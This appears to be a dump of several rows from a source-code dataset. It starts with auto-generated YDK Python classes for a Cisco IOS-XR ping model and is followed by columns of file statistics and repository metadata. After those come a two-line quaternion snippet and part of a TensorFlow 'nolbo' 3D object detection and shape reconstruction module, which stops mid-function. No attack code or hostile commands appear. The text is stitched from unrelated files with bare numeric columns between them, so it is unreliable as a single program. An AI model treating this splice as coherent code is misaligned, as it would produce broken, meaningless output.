_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv4.Replies, self).__init__()
self.yang_name = "replies"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("reply", ("reply", Ping.Output.PingResponse.Ipv4.Replies.Reply))])
self._leafs = OrderedDict()
self.reply = YList(self)
self._segment_path = lambda: "replies"
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies, [], name, value)
class Reply(Entity):
"""
.. attribute:: reply_index (key)
Index of the reply list
**type**\: int
**range:** 1..2147483647
.. attribute:: result
Response for each packet
**type**\: str
.. attribute:: broadcast_reply_addresses
**type**\: :py:class:`BroadcastReplyAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv4.Replies.Reply, self).__init__()
self.yang_name = "reply"
self.yang_parent_name = "replies"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['reply_index']
self._child_container_classes = OrderedDict([("broadcast-reply-addresses", ("broadcast_reply_addresses", Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('reply_index', YLeaf(YType.uint64, 'reply-index')),
('result', YLeaf(YType.str, 'result')),
])
self.reply_index = None
self.result = None
self.broadcast_reply_addresses = Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses()
self.broadcast_reply_addresses.parent = self
self._children_name_map["broadcast_reply_addresses"] = "broadcast-reply-addresses"
self._children_yang_names.add("broadcast-reply-addresses")
self._segment_path = lambda: "reply" + "[reply-index='" + str(self.reply_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply, ['reply_index', 'result'], name, value)
class BroadcastReplyAddresses(Entity):
"""
.. attribute:: broadcast_reply_address
**type**\: list of :py:class:`BroadcastReplyAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses, self).__init__()
self.yang_name = "broadcast-reply-addresses"
self.yang_parent_name = "reply"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("broadcast-reply-address", ("broadcast_reply_address", Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress))])
self._leafs = OrderedDict()
self.broadcast_reply_address = YList(self)
self._segment_path = lambda: "broadcast-reply-addresses"
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses, [], name, value)
class BroadcastReplyAddress(Entity):
"""
.. attribute:: reply_address (key)
Broadcast reply address
**type**\: str
.. attribute:: result
Sign for each reply packet
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress, self).__init__()
self.yang_name = "broadcast-reply-address"
self.yang_parent_name = "broadcast-reply-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['reply_address']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('reply_address', YLeaf(YType.str, 'reply-address')),
('result', YLeaf(YType.str, 'result')),
])
self.reply_address = None
self.result = None
self._segment_path = lambda: "broadcast-reply-address" + "[reply-address='" + str(self.reply_address) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress, ['reply_address', 'result'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: sweep_min
Minimum value of sweep size
**type**\: int
**range:** 0..4294967295
.. attribute:: sweep_max
Maximum value of sweep size
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rotate_pattern
Rotate Pattern is enabled
**type**\: bool
.. attribute:: replies
**type**\: :py:class:`Replies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6.Replies>`
.. attribute:: hits
Number of packets reach to destination and get reply back
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: total
Total number of packets sent out
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: success_rate
Successful rate of ping
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_min
Minimum value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_avg
Average value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_max
Maximum value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "ping-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("replies", ("replies", Ping.Output.PingResponse.Ipv6.Replies))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', YLeaf(YType.str, 'destination')),
('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
('data_size', YLeaf(YType.uint64, 'data-size')),
('timeout', YLeaf(YType.uint64, 'timeout')),
('interval', YLeaf(YType.uint32, 'interval')),
('pattern', YLeaf(YType.str, 'pattern')),
('sweep', YLeaf(YType.boolean, 'sweep')),
('sweep_min', YLeaf(YType.uint32, 'sweep-min')),
('sweep_max', YLeaf(YType.uint64, 'sweep-max')),
('rotate_pattern', YLeaf(YType.boolean, 'rotate-pattern')),
('hits', YLeaf(YType.uint64, 'hits')),
('total', YLeaf(YType.uint64, 'total')),
('success_rate', YLeaf(YType.uint64, 'success-rate')),
('rtt_min', YLeaf(YType.uint64, 'rtt-min')),
('rtt_avg', YLeaf(YType.uint64, 'rtt-avg')),
('rtt_max', YLeaf(YType.uint64, 'rtt-max')),
])
self.destination = None
self.repeat_count = None
self.data_size = None
self.timeout = None
self.interval = None
self.pattern = None
self.sweep = None
self.sweep_min = None
self.sweep_max = None
self.rotate_pattern = None
self.hits = None
self.total = None
self.success_rate = None
self.rtt_min = None
self.rtt_avg = None
self.rtt_max = None
self.replies = Ping.Output.PingResponse.Ipv6.Replies()
self.replies.parent = self
self._children_name_map["replies"] = "replies"
self._children_yang_names.add("replies")
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv6, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'sweep_min', 'sweep_max', 'rotate_pattern', 'hits', 'total', 'success_rate', 'rtt_min', 'rtt_avg', 'rtt_max'], name, value)
class Replies(Entity):
"""
.. attribute:: reply
**type**\: list of :py:class:`Reply <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6.Replies.Reply>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv6.Replies, self).__init__()
self.yang_name = "replies"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("reply", ("reply", Ping.Output.PingResponse.Ipv6.Replies.Reply))])
self._leafs = OrderedDict()
self.reply = YList(self)
self._segment_path = lambda: "replies"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/ipv6/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv6.Replies, [], name, value)
class Reply(Entity):
"""
.. attribute:: reply_index (key)
Index of the reply list
**type**\: int
**range:** 1..2147483647
.. attribute:: result
Response for each packet
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv6.Replies.Reply, self).__init__()
self.yang_name = "reply"
self.yang_parent_name = "replies"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['reply_index']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('reply_index', YLeaf(YType.uint64, 'reply-index')),
('result', YLeaf(YType.str, 'result')),
])
self.reply_index = None
self.result = None
self._segment_path = lambda: "reply" + "[reply-index='" + str(self.reply_index) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/ipv6/replies/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv6.Replies.Reply, ['reply_index', 'result'], name, value)
def clone_ptr(self):
self._top_entity = Ping()
return self._top_entity
| 37.792482
| 307
| 0.433974
| 3,903
| 48,261
| 5.134768
| 0.053036
| 0.031935
| 0.020957
| 0.01946
| 0.906791
| 0.884637
| 0.85839
| 0.846864
| 0.841076
| 0.827903
| 0
| 0.030498
| 0.461905
| 48,261
| 1,276
| 308
| 37.8221
| 0.74123
| 0.23288
| 0
| 0.764069
| 0
| 0.004329
| 0.133865
| 0.026674
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062771
| false
| 0
| 0.010823
| 0
| 0.112554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
824d517524ce89e71e9d2d9e5ffa092ab4aca89b
| 68
|
py
|
Python
|
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
q1 = Quaternion(0.7,2.2,-2.2,-0.7)
q2 = Quaternion(0.7,2.2,-2.2,0.7)
| 34
| 34
| 0.588235
| 20
| 68
| 2
| 0.3
| 0.3
| 0.3
| 0.65
| 0.9
| 0.9
| 0.9
| 0.9
| 0.9
| 0
| 0
| 0.285714
| 0.073529
| 68
| 2
| 35
| 34
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
82c6830463da0ca9c8c6e1194d31817f310e7a36
| 90,208
|
py
|
Python
|
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | 1
|
2022-02-17T06:03:57.000Z
|
2022-02-17T06:03:57.000Z
|
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | null | null | null |
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | null | null | null |
import src.net_core.darknet as darknet
import src.net_core.autoencoder3D as ae3D
import src.net_core.priornet as priornet
import numpy as np
from src.module.function import *
from src.box_IoU_rotation.box_intersection_2d import *
# @tf.RegisterGradient("DynamicPartition")
# def _DynamicPartitionGrads(op, *grads):
# """Gradients for DynamicPartition."""
# data = op.inputs[0]
# indices = op.inputs[1]
# num_partitions = op.get_attr("num_partitions")
#
# prefix_shape = tf.shape(indices)
# original_indices = tf.reshape(tf.range(tf.reduce_prod(prefix_shape)), prefix_shape)
# partitioned_indices = tf.dynamic_partition(original_indices, indices, num_partitions)
# reconstructed = tf.dynamic_stitch(partitioned_indices, grads)
# reconstructed = tf.reshape(reconstructed, tf.shape(data))
# return [reconstructed, None]
config = {
'encoder_backbone':{
'name' : 'nolbo_backbone',
'predictor_num':9,
'bbox2D_xy_dim':2, 'bbox3D_dim':3, 'orientation_dim':1,
'localZ_dim':1,
'inst_dim':10, 'z_inst_dim':16,
'activation' : 'elu',
},
'encoder_head':{
'name' : 'nolbo_head',
'output_dim' : 5*(1+4+3+(2*3+3)+2*16),
'filter_num_list':[1024,1024,1024],
'filter_size_list':[3,3,3],
'activation':'elu',
},
'decoder':{
'name':'docoder',
'input_dim' : 16,
'output_shape':[64,64,64,1],
'filter_num_list':[512,256,128,64,1],
'filter_size_list':[4,4,4,4,4],
'strides_list':[1,2,2,2,2],
'activation':'elu',
'final_activation':'sigmoid'
},
'prior' : {
'name' : 'priornet',
'input_dim' : 10, # class num (one-hot vector)
'unit_num_list' : [64, 32, 16],
'core_activation' : 'elu',
'const_log_var' : 0.0,
}
}
class nolbo(object):
def __init__(self, nolbo_structure,
learning_rate=1e-4,
IoU2D_loss=True, IoU3D_loss=True,
solver='adam'):
self._category_num = nolbo_structure['category_num']
self._enc_backbone_str = nolbo_structure['encoder_backbone']
# self._name = nolbo_structure['name']
# self._predictor_num = nolbo_structure['predictor_num']
# self._bbox2D_dim = nolbo_structure['bbox2D_dim']
# self._bbox3D_dim = nolbo_structure['bbox3D_dim']
# self._orientation_dim = nolbo_structure['orientation_dim']
# self._inst_dim = nolbo_structure['inst_dim']
# self._z_inst_dim = nolbo_structure['z_inst_dim']
self._enc_head_str = nolbo_structure['encoder_head']
self._dec_str = nolbo_structure['decoder']
self._prior_str = nolbo_structure['prior']
self._rad_var = (15.0/180.0 * 3.141593) ** 2
self._IoU2D_loss, self._IoU3D_loss = IoU2D_loss, IoU3D_loss
# # self._strategy = strategy
# self._strategy = tf.distribute.MirroredStrategy()
# self._BATCH_SIZE_PER_REPLICA = BATCH_SIZE_PER_REPLICA
# self._GLOBAL_BATCH_SIZE = self._BATCH_SIZE_PER_REPLICA * self._strategy.num_replicas_in_sync
self._buildModel()
if solver == 'adam' or solver == 'Adam':
self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
elif solver == 'sgd' or solver == 'SGD':
self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, decay=0.0005)
def _buildModel(self):
print('build Models...')
self._encoder_core = darknet.Darknet19(name=self._enc_backbone_str['name'], activation='lrelu')
self._encoder_core_head = darknet.Darknet19_head2D(name=self._enc_backbone_str['name'] + '_head',
activation='lrelu')
# ==============set encoder head
self._encoder_head = darknet.head2D(name=self._enc_head_str['name'],
input_shape=[None, None, 1024],
output_dim=self._enc_head_str['output_dim'],
last_pooling=None, activation=self._enc_head_str['activation'])
# #==============set decoder3D
self._decoder = ae3D.decoder3D(structure=self._dec_str)
self._priornet_car = priornet.priornet(structure=self._prior_str)
self._classifier = darknet.classifier(name=None, input_shape=[64,], output_dim=self._category_num, activation='relu')
print('done')
def fit(self, inputs):
self._getInputs(inputs=inputs)
with tf.GradientTape() as tape:
# get encoder output and loss
self._enc_output = self._encoder_head(
self._encoder_core_head(
self._encoder_core(self._input_images, training=True)
, training=True)
, training=True)
self._calcEncoderOutput()
self._category_pred = self._classifier(self._z, training=True)
self._getEncoderLoss()
# # get (priornet, decoder) output and loss
self._inst_mean_prior, self._inst_log_var_prior = self._priornet_car(self._carInstList, training=True)
self._outputs = self._decoder(self._z_car, training=True)
self._getDecoderAndPriorLoss()
# get network parameter regulization loss
# reg_loss = tf.reduce_sum(self._encoder_head.losses + self._encoder_backbone.losses + self._decoder.losses + self._priornet.losses)
# reg_loss = tf.reduce_sum(self._encoder_backbone.losses + self._encoder_head.losses)
self._loss_objness = tf.reduce_mean(self._loss_objness, axis=0)
# print(self._loss_objness.shape)
self._loss_no_objness = tf.reduce_mean(self._loss_no_objness, axis=0)
self._loss_bbox2D_hw = tf.reduce_mean(self._loss_bbox2D_hw, axis=0)
self._loss_bbox2D_xy = tf.reduce_mean(self._loss_bbox2D_xy, axis=0)
self._loss_bbox2D_CIOU = tf.reduce_mean(self._loss_bbox2D_CIOU, axis=0)
self._loss_bbox3D = tf.reduce_mean(self._loss_bbox3D, axis=0)
self._loss_bbox3D_IoU = tf.reduce_mean(self._loss_bbox3D_IoU, axis=0)
self._loss_localXYZ = tf.reduce_mean(self._loss_localXYZ, axis=0)
self._loss_shape = tf.reduce_mean(self._loss_shape, axis=0)
self._loss_latents_kl = tf.reduce_mean(self._loss_latents_kl, axis=0)
self._loss_prior_reg = tf.reduce_mean(self._loss_prior_reg, axis=0)
self._loss_sincos = tf.reduce_mean(self._loss_sincos, axis=0)
self._loss_sincos1 = tf.reduce_mean(self._loss_sincos1, axis=0)
# self._loss_sincos_kl = tf.reduce_mean(self._loss_sincos_kl, axis=0)
self._loss_category = tf.reduce_mean(self._loss_category, axis=0)
# total loss
total_loss = (
30.0 * self._loss_objness + 0.05 * self._loss_no_objness
+ 20.0 * self._loss_bbox3D + 20.0 * self._loss_bbox2D_xy
# + 20.0 * self._loss_bbox3D_IoU + 20.0 * self._loss_bbox2D_CIOU
+ 100.0 * self._loss_localXYZ
+ self._loss_shape
+ self._loss_latents_kl
+ 0.01 * self._loss_prior_reg
+ 100.0 * self._loss_sincos + 1000. * self._loss_sincos1
# + 0.01 * self._loss_sincos_kl
+ 100.0 * self._loss_category
# + reg_loss
)
if self._IoU2D_loss:
total_loss += 20.0 * (self._loss_bbox2D_CIOU + 0.1 * self._loss_bbox2D_hw)
if self._IoU3D_loss:
total_loss += self._loss_bbox3D_IoU
trainable_variables = self._encoder_core.trainable_variables + self._encoder_core_head.trainable_variables + self._encoder_head.trainable_variables\
+ self._decoder.trainable_variables + self._priornet_car.trainable_variables + self._classifier.trainable_variables
grads = tape.gradient(total_loss, trainable_variables)
self._optimizer.apply_gradients(zip(grads, trainable_variables))
# ==== evaluations
self._objnessEval()
self._obj_prb = tf.reduce_mean(self._obj_prb)
self._no_obj_prb = tf.reduce_mean(self._no_obj_prb)
TP, FP, FN = voxelPrecisionRecall(xTarget=self._output_images_gt, xPred=self._outputs)
pr = tf.reduce_mean(TP / (TP + FP + 1e-10))
rc = tf.reduce_mean(TP / (TP + FN + 1e-10))
return self._loss_objness, self._loss_no_objness,\
self._loss_bbox2D_CIOU, self._loss_bbox3D_IoU, \
self._loss_bbox3D, self._loss_localXYZ, \
self._loss_sincos, self._loss_sincos1,\
self._loss_category, self._loss_shape, \
self._obj_prb, self._no_obj_prb, \
pr, rc
def saveEncoderBackbone(self, save_path):
file_name = self._enc_backbone_str['name']
self._encoder_core.save_weights(os.path.join(save_path, file_name))
def saveEncoderHead(self, save_path):
file_name = self._enc_backbone_str['name'] + '_head'
self._encoder_core_head.save_weights(os.path.join(save_path, file_name))
file_name = self._enc_head_str['name']
self._encoder_head.save_weights(os.path.join(save_path, file_name))
def saveEncoder(self, save_path):
self.saveEncoderBackbone(save_path=save_path)
self.saveEncoderHead(save_path=save_path)
def saveDecoder(self, save_path):
file_name = self._dec_str['name']
self._decoder.save_weights(os.path.join(save_path, file_name))
def savePriornet(self, save_path):
file_name = self._prior_str['name']
self._priornet_car.save_weights(os.path.join(save_path, file_name))
def saveClassifier(self, save_path):
file_name = 'classifier'
self._classifier.save_weights(os.path.join(save_path, file_name))
def saveModel(self, save_path):
self.saveEncoder(save_path=save_path)
self.saveDecoder(save_path=save_path)
self.savePriornet(save_path=save_path)
self.saveClassifier(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
if file_name == None:
file_name = self._enc_backbone_str['name']
self._encoder_core.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path):
file_name = self._enc_backbone_str['name'] + '_head'
self._encoder_core_head.load_weights(os.path.join(load_path, file_name))
file_name = self._enc_head_str['name']
self._encoder_head.load_weights(os.path.join(load_path, file_name))
def loadEncoder(self, load_path):
self.loadEncoderBackbone(load_path=load_path)
self.loadEncoderHead(load_path=load_path)
def loadDecoder(self, load_path, file_name=None):
if file_name == None:
file_name = self._dec_str['name']
self._decoder.load_weights(os.path.join(load_path, file_name))
def loadPriornet(self, load_path):
file_name = self._prior_str['name']
self._priornet_car.load_weights(os.path.join(load_path, file_name))
def loadClassifier(self, load_path):
file_name = 'classifier'
self._classifier.load_weights(os.path.join(load_path, file_name))
def loadModel(self, load_path):
self.loadEncoder(load_path=load_path)
self.loadDecoder(load_path=load_path)
self.loadPriornet(load_path=load_path)
self.loadClassifier(load_path=load_path)
def _getInputs(self, inputs):
self._offset_x, self._offset_y, self._input_images,\
self._objness_gt, self._objnessCar_gt,\
self._bbox2D_dim_gt, self._bbox2D_xy_gt, self._bbox3D_dim_gt,\
self._localXYZ_gt, self._rad_gt, \
self._bbox3D8Points_gt,\
self._image_size, self._P2_gt, self._P2_inv_gt, self._category_gt, \
self._output_images_gt, self._carInstList, \
self._anchor_z, self._anchor_bbox3D = inputs
# self._output_images_gt, self._inst_vectors_gt, \
self._offset_x = tf.convert_to_tensor(self._offset_x)
self._offset_y = tf.convert_to_tensor(self._offset_y)
self._input_images = tf.convert_to_tensor(self._input_images)
self._objness_gt = tf.convert_to_tensor(self._objness_gt)
self._objnessCar_gt = tf.convert_to_tensor(self._objnessCar_gt)
self._bbox2D_dim_gt = tf.convert_to_tensor(self._bbox2D_dim_gt)
self._bbox2D_xy_gt = tf.convert_to_tensor(self._bbox2D_xy_gt)
self._bbox3D_dim_gt = tf.convert_to_tensor(self._bbox3D_dim_gt)
self._localXYZ_gt = tf.convert_to_tensor(self._localXYZ_gt)
self._rad_gt = tf.convert_to_tensor(self._rad_gt)
self._bbox3D8Points_gt = tf.convert_to_tensor(self._bbox3D8Points_gt)
# print(self._bbox3D8Points_gt.shape)
self._image_size = tf.convert_to_tensor(self._image_size)
self._P2_gt = tf.convert_to_tensor(self._P2_gt)
self._P2_inv_gt = tf.convert_to_tensor(self._P2_inv_gt)
self._category_gt = tf.convert_to_tensor(self._category_gt)
self._output_images_gt = tf.convert_to_tensor(self._output_images_gt)
self._carInstList = tf.convert_to_tensor(self._carInstList)
self._anchor_z = tf.convert_to_tensor(self._anchor_z)
self._anchor_bbox3D = tf.convert_to_tensor(self._anchor_bbox3D)
self._sin_gt = tf.sin(self._rad_gt)
self._cos_gt = tf.cos(self._rad_gt)
def _calcEncoderOutput(self):
self._encOutPartitioning()
self._selectObjAndSampling()
self._calcXYZ()
self._calcBbox3Dand2D()
self._getbbox2DIOU()
def _getEncoderLoss(self):
self._bbox2DLoss()
self._objnessLoss()
self._bbox2DLossCIOU()
self._bbox3DLoss()
self._bbox3DIoULoss()
self._localXYZLoss()
self._poseLoss()
self._classificationLoss()
def _getDecoderAndPriorLoss(self):
self._objLatentAndShapeLoss()
self._priorRegLoss()
def _encOutPartitioning(self):
pr_num = self._enc_backbone_str['predictor_num']
self._objness, self._bbox2D_xy, self._bbox3D_dim, self._localZ = [], [], [], []
self._latent_mean, self._latent_log_var = [], []
self._sin, self._cos = [], []
part_start = 0
part_end = part_start
for predIndex in range(pr_num):
# objectness
part_end += 1
self._objness.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['bbox2DXY_dim']
self._bbox2D_xy.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['bbox3D_dim']
self._bbox3D_dim.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['localXYZ_dim']
self._localZ.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['latent_dim']
self._latent_mean.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['latent_dim']
self._latent_log_var.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['orientation_dim']
self._sin.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['orientation_dim']
self._cos.append(self._enc_output[..., part_start:part_end])
part_start = part_end
# part_end += self._enc_backbone_str['orientation_dim']
# self._rad_log_var.append(self._enc_output[..., part_start:part_end])
# part_start = part_end
# print(part_end)
self._objness = tf.sigmoid(tf.transpose(tf.stack(self._objness), [1, 2, 3, 0, 4]))
self._bbox2D_xy = tf.sigmoid(tf.transpose(tf.stack(self._bbox2D_xy), [1, 2, 3, 0, 4]))
self._bbox3D_dim = tf.transpose(tf.stack(self._bbox3D_dim), [1, 2, 3, 0, 4])
self._bbox3D_dim = tf.clip_by_value(self._bbox3D_dim, clip_value_min=-3.0, clip_value_max=3.0)
self._bbox3D_dim = tf.exp(self._bbox3D_dim) * self._anchor_bbox3D
# print(self._bbox3D_dim.shape)
self._localZ = tf.transpose(tf.stack(self._localZ), [1, 2, 3, 0, 4])
self._localZ = self._localZ + tf.expand_dims(self._anchor_z, axis=-1)
self._latent_mean = tf.transpose(tf.stack(self._latent_mean), [1, 2, 3, 0, 4])
self._latent_log_var = tf.transpose(tf.stack(self._latent_log_var), [1, 2, 3, 0, 4])
self._sin = tf.tanh(tf.transpose(tf.stack(self._sin), [1, 2, 3, 0, 4]))
self._cos = tf.tanh(tf.transpose(tf.stack(self._cos), [1, 2, 3, 0, 4]))
# self._rad_log_var = tf.transpose(tf.stack(self._rad_log_var), [1, 2, 3, 0, 4])
# print(self._localZ.shape)
# print(self._bbox3D_dim.shape)
def _matmul3x1(self, a, b):
# c0 = a[..., 0, 0] * b[..., 0] + a[..., 0, 1] * b[..., 1] + a[..., 0, 2] * b[..., 2]
# c1 = a[..., 1, 0] * b[..., 0] + a[..., 1, 1] * b[..., 1] + a[..., 1, 2] * b[..., 2]
# c2 = a[..., 2, 0] * b[..., 0] + a[..., 2, 1] * b[..., 1] + a[..., 2, 2] * b[..., 2]
# return tf.stack([c0, c1, c2], axis=-1)
c = tf.reduce_sum(a * tf.expand_dims(b, -2), axis=-1)
return c
def _matmul4x1(self, a, b):
# c0 = a[..., 0, 0] * b[..., 0] + a[..., 0, 1] * b[..., 1] + a[..., 0, 2] * b[..., 2] + a[..., 0, 3] * b[..., 3]
# c1 = a[..., 1, 0] * b[..., 0] + a[..., 1, 1] * b[..., 1] + a[..., 1, 2] * b[..., 2] + a[..., 1, 3] * b[..., 3]
# c2 = a[..., 2, 0] * b[..., 0] + a[..., 2, 1] * b[..., 1] + a[..., 2, 2] * b[..., 2] + a[..., 2, 3] * b[..., 3]
# c3 = a[..., 3, 0] * b[..., 0] + a[..., 3, 1] * b[..., 1] + a[..., 3, 2] * b[..., 2] + a[..., 3, 3] * b[..., 3]
# return tf.stack([c0, c1, c2, c3], axis=-1)
c = tf.reduce_sum(a * tf.expand_dims(b, -2), axis=-1)
return c
def _get3DBboxAnd2DPorj(self, projmat, R, t, lhw):
# projmat : (batch, gridrow, girdcol, pred, 4x4)
# R : (batch, gridrow, gridcol, pred, 3x3)
# t : (batch, gridrow, gridcol, pred, 3)
# lhw : (batch, gridrow, gridcol, pred, 3)
dx, dy, dz = -lhw[...,0]/2., -lhw[...,1]/2., -lhw[...,2]/2.
dxdydz = []
for i in range(2):
dy = -1. * dy
for j in range(2):
dx = -1. * dx
for k in range(2): # [x,y,z], [
dz = -1. * dz
dxdydz.append(tf.stack([dx,dy,dz], axis=-1)) #(8, b,gr,gc,pr,3)
dxdydz = tf.transpose(tf.stack(dxdydz), [1,2,3,4,0,5]) #(b,gr,gc,pr,8,3)
R_tile = tf.transpose(tf.stack([R]*8), [1,2,3,4,0,5,6])
t_tile = tf.transpose(tf.stack([t]*8), [1,2,3,4,0,5])
bbox3D8Points = self._matmul3x1(R_tile, dxdydz) + t_tile #(b,gr,gc,pr,8,3)
x_4d = tf.concat([bbox3D8Points, tf.expand_dims(tf.ones_like(dxdydz[...,0]),axis=-1)], axis=-1) #(b,gr,gc,pr,8,4)
projmat_tile = tf.transpose(tf.stack([projmat]*8), [1,2,3,4,0,5,6])
bbox3D8PointsProj = self._matmul4x1(projmat_tile, x_4d)
bbox3D8PointsProj = bbox3D8PointsProj[..., :2] / (tf.expand_dims(bbox3D8PointsProj[..., 2], axis=-1) + 1e-9)
# print(bbox3D8PointsProj.shape)
# select proj point
x1 = tf.reduce_min(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0] # (b,gr,gc,pr)
